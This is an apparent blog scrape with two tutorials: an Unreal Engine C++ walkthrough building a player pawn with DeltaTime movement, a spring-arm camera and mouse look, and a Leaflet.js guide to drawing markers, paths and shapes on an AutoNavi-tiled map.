    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

506-Why use DeltaTime for movement

​Moving by DeltaTime keeps the movement speed identical across frame rates; the worked numbers follow, with a one-line derivation after the list.

• Suppose two players whose Tick moves them $1$ unit per frame:
  P1 at $10$ FPS: $\Delta t = 1/10 = 0.1\,\mathrm{s}$
  P2 at $5$ FPS: $\Delta t = 1/5 = 0.2\,\mathrm{s}$

• Without $\Delta t$:
  P1: $10 \times 1$, moves $10$ units per second
  P2: $5 \times 1$, moves $5$ units per second

• With $\Delta t$:
  P1: $10 \times 1 \times 0.1 = 1$, moves $1$ unit per second
  P2: $5 \times 1 \times 0.2 = 1$, moves $1$ unit per second

• FPS: Frames Per Second
  $60$ FPS means $60$ frames per second
  $30$ FPS means $30$ frames per second

• Tick runs every frame
  $\Delta t$ is the interval between two frames
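In symbols: with speed $v$, per-frame step $v\,\Delta t$, and $\Delta t = 1/\mathrm{FPS}$,

$$\text{distance per second} = \mathrm{FPS} \times v\,\Delta t = \mathrm{FPS} \times v \times \frac{1}{\mathrm{FPS}} = v,$$

independent of the frame rate.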

    png

​The FPS can be displayed here in the viewport.

    png

​Press ` to open the console and enter the command `t.MaxFPS 10` to cap the maximum frame rate at 10.
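Console commands can also be issued from C++; a hedged one-liner, assuming it runs inside an actor (UWorld::Exec is the generic console-command entry point):

GetWorld()->Exec(GetWorld(), TEXT("t.MaxFPS 10")); // same effect as typing it in the console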

507-Adding a SpringArm component

​Modify MyPawn.h, declaring class USpringArmComponent* MySpringArm;:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class USpringArmComponent* MySpringArm;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;
    };

​Modify MyPawn.cpp:

​The original course used:

    MySpringArm->RelativeRotation = FRotator(-45.0f, 0.0f, 0.0f);

​but in my engine version this member has become private, so it should be:

    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySpringArm"));
    MySpringArm->SetupAttachment(MyStaticMesh);
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(MySpringArm);

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

​Delete the existing BP_MyPawn and recreate it. Then hit Play!

    png

508-Setting default mesh and material values from C++

​Modify MyPawn.h, adding getter functions for the UStaticMeshComponent and the USpringArmComponent.

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class USpringArmComponent* MySpringArm;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    FORCEINLINE UStaticMeshComponent* GetStaticMeshComponent() { return MyStaticMesh; }
    FORCEINLINE USpringArmComponent* GetSpringArmComponent() { return MySpringArm; }

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;
    };

​Modify MyPawn.cpp:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySpringArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    png

​The path passed to StaticMeshAsset(TEXT(...)) can be obtained this way.

    png

​The path passed to MaterialAsset(TEXT(...)) can be obtained this way.

    png

​After compiling, delete the blueprint and rebuild BP_MyPawn.

509-Sweep only affects the root component

​In the earlier code:

    AddActorLocalOffset(Velocity * DeltaTime, true);

​Sweep was enabled yet collision did not take effect, because Sweep only applies to the root component. So modify MyPawn.cpp to make MyStaticMesh the root component:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    // RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    RootComponent = MyStaticMesh;
    MyStaticMesh->SetCollisionProfileName(TEXT("Pawn"));

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySpringArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

510-Controlling the camera's up/down view

    png

​Add two axes, LookUp and LookRight, in Project Settings.

​Modify MyPawn.h, declaring the functions LookUp() and LookRight() and the mouse input MouseInput:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class USpringArmComponent* MySpringArm;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    FORCEINLINE UStaticMeshComponent* GetStaticMeshComponent() { return MyStaticMesh; }
    FORCEINLINE USpringArmComponent* GetSpringArmComponent() { return MySpringArm; }

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;

    void LookUp(float Value);
    void LookRight(float Value);
    FVector2D MouseInput;
    };

​Modify MyPawn.cpp so the view pitches up and down with the mouse:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    // RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    RootComponent = MyStaticMesh;
    MyStaticMesh->SetCollisionProfileName(TEXT("Pawn"));

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySpringArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);

// In Unreal, the rotation axes X, Y, Z correspond to Roll, Pitch, Yaw
    FRotator NewSpringArmRotation = MySpringArm->GetComponentRotation();
    NewSpringArmRotation.Pitch = FMath::Clamp(NewSpringArmRotation.Pitch += MouseInput.Y, -80.0f, 0.0f);
    MySpringArm->SetWorldRotation(NewSpringArmRotation);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    PlayerInputComponent->BindAxis(TEXT("LookUp"), this, &AMyPawn::LookUp);
    PlayerInputComponent->BindAxis(TEXT("LookRight"), this, &AMyPawn::LookRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::LookUp(float Value)
    {
    MouseInput.Y = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    void AMyPawn::LookRight(float Value)
    {
    MouseInput.X = FMath::Clamp(Value, -1.0f, 1.0f);
    }

511-Using the Controller to rotate the view left and right

​Modify MyPawn.cpp so the view yaws left and right with the mouse (AddControllerYawInput(MouseInput.X);):

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    // RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    RootComponent = MyStaticMesh;
    MyStaticMesh->SetCollisionProfileName(TEXT("Pawn"));

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySpringArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;
    bUseControllerRotationRoll = true;
    bUseControllerRotationPitch = true;
    bUseControllerRotationYaw = true;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);

// In Unreal, the rotation axes X, Y, Z correspond to Roll, Pitch, Yaw
    AddControllerYawInput(MouseInput.X);

    FRotator NewSpringArmRotation = MySpringArm->GetComponentRotation();
    NewSpringArmRotation.Pitch = FMath::Clamp(NewSpringArmRotation.Pitch += MouseInput.Y, -80.0f, 0.0f);
    MySpringArm->SetWorldRotation(NewSpringArmRotation);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    PlayerInputComponent->BindAxis(TEXT("LookUp"), this, &AMyPawn::LookUp);
    PlayerInputComponent->BindAxis(TEXT("LookRight"), this, &AMyPawn::LookRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::LookUp(float Value)
    {
    MouseInput.Y = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    void AMyPawn::LookRight(float Value)
    {
    MouseInput.X = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    png

These properties control whether the Pawn's rotation follows the controller's rotation:

• bUseControllerRotationRoll: when true, the Pawn's Roll follows the controller's Roll.
• bUseControllerRotationPitch: when true, the Pawn's Pitch follows the controller's Pitch.
• bUseControllerRotationYaw: when true, the Pawn's Yaw follows the controller's Yaw.

When these are true, the Pawn's rotation is driven by the controller rather than by the component's own rotation rules. This is useful for first- or third-person character control, where the player steers the character's facing with the controller. (An alternative sketch follows.)
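A hedged alternative, not the course's approach: leave bUseControllerRotationYaw false and yaw the pawn directly, without routing through the controller:

// In AMyPawn::Tick, instead of AddControllerYawInput(MouseInput.X):
AddActorLocalRotation(FRotator(0.0f, MouseInput.X, 0.0f)); // FRotator(Pitch, Yaw, Roll)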

/posts/Web-Leaflet/
Foreword

​A long time ago I was fond of a plugin called Hexo-tag-map, but it turned out to offer too little control and I eventually dropped it. Now let's look into its underlying library, Leaflet.js, for better control!

Resources

Quick start

​Include the required assets:

    <link rel="stylesheet" href="https://unpkg.com/leaflet@1.9.3/dist/leaflet.css"
    integrity="sha256-kLaT2GOSpHechhsozzB+flnD+zUyjE2LlfWPgU04xyI="
    crossorigin=""/>
    <!-- Make sure you put this AFTER Leaflet's CSS -->
    <script src="https://unpkg.com/leaflet@1.9.3/dist/leaflet.js"
    integrity="sha256-WBkoXOwTeyKclOHuWtc+i2uENFpDZ9YPdf5Hf+D7ewM="
    crossorigin=""></script>

​You can also apply custom CSS to the map container:

    <style>
    #map { height: 280px; }
    </style>

​Place the map container and the JS that drives it:

    <div no-fancybox id="map"></div>
    <script type="text/javascript" src="map.js"></script>

no-fancybox prevents the element from being picked up by fancybox.

​map.js then goes to work on the <div id="map"></div>:

    // 创建一个 Leaflet 地图对象,设置了一些参数,如缩放级别、最大缩放级别、是否可编辑等,并将地图视图移动到指定的经纬度位置。
    var map = L.map('map',
    {
    zoomSnap: 0.1, // 地图的有效缩放级别
    maxZoom: 18, // 最大缩放级别
    // crs: L.CRS.EPSG4326, // 高德不是这个坐标系
    zoomControl: true,
    editable: true,
    // wheelPxPerZoomLevel:60 // 鼠标滚轮缩放 较小的值将使滚轮轮缩放更快
    }).setView([26.078799594917704, 119.29471468823111], 14); // 待显示地点的经纬度和缩放级别

    // 创建一个瓦片图层对象 baseLayer,指定了高德地图的瓦片地址和一些参数,然后将该图层添加到地图中。
    // 目前 http://map.geoq.cn/ArcGIS/rest/services/ChinaOnlineCommunity/MapServer/tile/{z}/{y}/{x} 也是可用的。
    let baseLayer = L.tileLayer("http://webrd0{s}.is.autonavi.com/appmaptile?lang=zh_cn&size=1&scale=1&style=8&x={x}&y={y}&z={z}", {
    attribution: '&copy; 高德地图',
    maxZoom: 18, // 应与 var map 里的 maxZoom 一致,不然显示不出来图片。
    minZoom: 3,
    subdomains: "1234",
    zoom: 3
    });
    map.addLayer(baseLayer);

    // 监听地图的点击事件,当用户点击地图时会输出当前点击的经纬度信息。
    map.on('click', function (event) {
    // console.log(event); // 返回当前点击的所有信息
    let { lat, lng } = event.latlng; // 经纬度信息
    console.log("[" + lat + ", " + lng + "]"); // 输出经纬度信息,便于调试
    });

    // 监听地图的缩放开始事件(zoomstart),当缩放级别发生改变时会输出当前的缩放级别。
    map.on('zoomstart', function () {
    var zoomLevel = map.getZoom();
    console.log(zoomLevel); // 显示缩放等级(好像只能显示滚动之前的)
    });

    // 给某个点做标记
    var marker = L.marker([26.081476491742904, 119.29704755981834]).addTo(map);
    marker.bindPopup("<b>这个地方真是太好玩了!</b><br/>这是屁股树的坐标😍!");

    // 定义路径点的坐标数组
    var latlngs = [
    [26.08009367221409,119.29242494512384],
    [26.080079217568272,119.29223174932305],
    [26.08009367221409,119.29216735072279],
    [26.080310491686973,119.29212978487263],
    [26.080296037067946,119.29162532917066],
    [26.080453431663422,119.29152938351272],
    [26.080381158638648,119.29095499726753],
    [26.07820812885429,119.29081367507568],
    [26.07815030932909,119.29159187052262],
    [26.078212947146778,119.29209635584687]
    ];
    // 创建路径对象并添加到地图上
    var polyline = L.polyline(latlngs, {color: 'green'}).addTo(map);
    polyline.bindPopup("上学去了😭");

    // 定义多边形的边界点坐标数组
    var latlngs = [
    [26.074889884389435,119.2912822984996],
    [26.073579264327183,119.2915720922007],
    [26.073902102248386,119.2926293025549],
    [26.07466823643904,119.29226437715347],
    [26.075150079274067,119.29180822040166]
    ];
    // 创建多边形对象并添加到地图上
    var polygon = L.polygon(latlngs, {color: 'blue'}).addTo(map);
    polygon.bindPopup("乌石山下,白马河旁~");

    // 绘制圆
    var circle = L.circle([26.077862817425885, 119.29212395568047], {
    color: 'red',
    fillColor: '#f03',
    fillOpacity: 0.5,
    radius: 32.6 // 这个单位是米。
    }).addTo(map);
    circle.bindPopup("阿公阿妈家~");

    // 定义矩形的地理边界
    var bounds = [[26.081312674254516, 119.2925756072068], [26.08073449305117, 119.29365965031108]];
    // 创建一个橙色的矩形
    var rectangle = L.rectangle(bounds, {color: "#ff7800", weight: 1}).addTo(map);
    rectangle.bindPopup("就没见它开张过!😠");

    // 创建 SVG,但好像 Popup 不能被点开
    var svgElement = document.createElementNS("http://www.w3.org/2000/svg", "svg");
    svgElement.setAttribute('xmlns', "http://www.w3.org/2000/svg");
    svgElement.setAttribute('viewBox', "0 0 200 200");
    svgElement.innerHTML = '<rect width="200" height="200"/><rect x="75" y="23" width="50" height="50" style="fill:red"/><rect x="75" y="123" width="50" height="50" style="fill:#0013ff"/>';
    var svgElementBounds = [[26.077898151572324, 119.30137317389199], [26.07745968496554, 119.30187226304396]];
    var svg = L.svgOverlay(svgElement, svgElementBounds).addTo(map);

    // 纯 popup
    var popup = L.popup()
        .setLatLng([26.079171783403833, 119.2939243421818])
        .setContent("小迷糊和小小怪最喜欢吃的百姓鲜捞~")
        .openOn(map);

    ​项目演示。点击一些标注可以弹出 popup

    ​可以用 坐标拾取器 | 高德地图 API (amap.com) 获取精确的坐标(注意经纬度是反的),也可以直接在上面的地图上点击,然后从控制窗口中获取想要的坐标。

    ​更多牛逼的功能可以看 Documentation - Leaflet - 一个交互式地图 JavaScript 库 (leafletjs.cn),好像还能玩得挺花。


    ​封装成一个类,以更便捷地实现基本的地图展示功能:

    class LeafletMap {
        // id:容器元素的 id;coordinate:中心点经纬度;zoom:缩放级别;marker:标注的 popup 文案
        constructor(id, coordinate, zoom, marker) {
            this.id = id;
            this.coordinate = coordinate;
            this.zoom = zoom;
            this.marker = marker;
        }

        render() {
            // 给容器设置基本尺寸
            $("#" + this.id).css({height: "280px"});
            $("#" + this.id).css({margin: "5px 0"});
            var map = L.map(this.id, {
                zoomSnap: 0.1,
                maxZoom: 18,
                zoomControl: true,
                editable: true,
            }).setView(this.coordinate, this.zoom);

            // 高德瓦片底图
            let baseLayer = L.tileLayer("http://webrd0{s}.is.autonavi.com/appmaptile?lang=zh_cn&size=1&scale=1&style=8&x={x}&y={y}&z={z}", {
                attribution: '&copy; 高德地图',
                maxZoom: 18,
                minZoom: 3,
                subdomains: "1234",
                zoom: 3
            });
            map.addLayer(baseLayer);

            // 在中心点放一个默认打开的标注
            var marker = L.marker(this.coordinate).addTo(map);
            marker.bindPopup(this.marker).openPopup();
        }
    }

    ​调用方法:

    <div no-fancybox id="map_XX"></div>

    <script defer>new LeafletMap("map_XX", [26.XX, 119.XX], 17, "XX").render()</script>
